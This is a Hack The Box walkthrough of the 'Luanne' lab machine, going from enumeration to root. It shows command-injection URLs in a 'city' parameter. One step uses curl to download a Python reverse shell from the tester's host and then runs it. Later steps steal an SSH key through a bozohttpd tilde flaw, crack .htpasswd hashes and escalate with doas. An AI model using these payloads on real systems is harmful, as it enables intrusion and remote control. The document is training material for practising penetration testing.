Luanne Box Writeup Walkthrough Htb Hackthebox – [HTB] – HackTheBox

In this walkthrough, we’ll explore the HackTheBox challenge ‘Luanne’. We’ll detail the process to secure both user.txt and root.txt files, providing a comprehensive guide for cybersecurity enthusiasts.

Introduction

Luanne was a machine available on Hack The Box, Hack The Box is an online platform designed for testing penetration testing skills and facilitating the exchange of ideas and methodologies among like-minded individuals. The platform features various challenges that are regularly updated.

This article will guide you through the process of hacking into the Luanne box to secure user.txt and root.txt.

Enumeration

To start, I used NMAP to scan for open ports and identify any available services. The scan revealed that ports 22, 80, and 9001 are open.

Next, navigate to the following URL and observe that an endpoint has been secured.

http://10.129.121.38/robots.txt

Hack Luanne Box

Obtain User.txt

The ‘city’ parameter is susceptible to command injection. I can execute an operating system command by navigating to the following URL.

1

http://10.129.121.38/weather/forecast?city=a') os.execute('OS_Command')--

For example:

1

http://10.129.121.38/weather/forecast?city=a') os.execute('id')--

Since the operating system is not a standard Linux OS and has limited available commands, I proceeded to find the location of the ‘python’ application using the ‘find’ command.

1

http://10.129.121.38/weather/forecast?city=a%27)%20os.execute(%27find+/+-name+"*python3.7*"%27)--

I then created a Python reverse shell and hosted an HTTP server locally.

Download the reverse shell to the /tmp folder by navigating to the following URL

1

http://10.129.121.38/weather/forecast?city=a%27)%20os.execute(%27curl+http://10.10.17.26/1.py+-o+/tmp/1.py%27)--

Finally, I gained a reverse shell by navigating to the following URL:

1

http://10.129.121.38/weather/forecast?city=a%27)%20os.execute(%27/usr/pkg/bin/python3.7+/tmp/1.py%27)--

Execute the following command to secure open ports. Observe that port 3001 is open locally:

1

netstat -an

I also discovered a .htpasswd file during my investigation.

After cracking the .htpasswd file, I secured the following credentials:

Execute the following command to visit the website hosted on port 3001:

1

curl -v --user  webapi_user:iamthebest http://127.0.0.1:3001/

I identified that the bozohttpd application is running on the server.

According to this article, several vulnerabilities exist in this application, including CVE-2010-2320 and CVE-2010-2195. Attackers can visit a user’s home folder by providing a tilde (~) in the URL.

I attempted to access r.michaels home folder by executing the following command:

1

curl -v --user webapi_user:iamthebest http://127.0.0.1:3001/~r.michaels/

Upon executing the command, successful access to r.michaels home folder was observed, as shown in the screenshot below:

Download the id_rsa file from the r.michaels home folder, Use the downloaded 1id_rsa file to log in as the r.michaels user.

I successfully secured the user.txt file.

Obtain Root.txt

After enumeration, I obtained a backup file: /home/r.michaels/backups/devel_backup-2020-09-16.tar.gz.enc

Attempted to decrypt it by OpenSSL, but it did not work. Then, I used the following command to decrypt it:

1

netpgp --decrypt devel_backup-2020-09-16.tar.gz.enc --output=/tmp/1.tar.gz

Upon successful decryption, I observed the decrypted content, as shown in the screenshot below:

I discovered another .htpasswd file within the tar file.

After cracking the hash from the .htpasswd file, I obtained another credential:

I checked the doas configuration and confirmed that the current user is able to run commands as root using the following command:

1

cat /usr/pkg/etc/doas.conf

Using the obtained credential, I executed the following command to swap to the root user:

1

doas -u root /bin/sh